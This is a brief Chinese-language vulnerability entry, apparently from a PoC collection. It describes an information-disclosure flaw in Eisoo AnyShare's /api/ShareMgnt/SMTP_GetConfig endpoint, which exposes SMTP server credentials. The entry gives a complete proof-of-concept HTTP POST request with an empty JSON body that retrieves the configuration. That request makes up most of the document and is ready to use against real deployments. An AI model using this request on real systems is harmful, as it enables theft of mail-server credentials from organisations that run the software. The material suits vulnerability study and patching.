漏洞描述
爱数AnyShare的SMTP_GetConfig接口存在信息泄露漏洞。攻击者可以通过该接口获取到敏感的配置信息,例如SMTP服务器的用户名和密码等。攻击者通过构造特殊URL地址,读取系统敏感信息。
爱数 AnyShare /api/ShareMgnt/SMTP_GetConfig 信息泄露漏洞
PoC代码
POST /api/ShareMgnt/SMTP_GetConfig HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 2
Content-Type: application/json
{}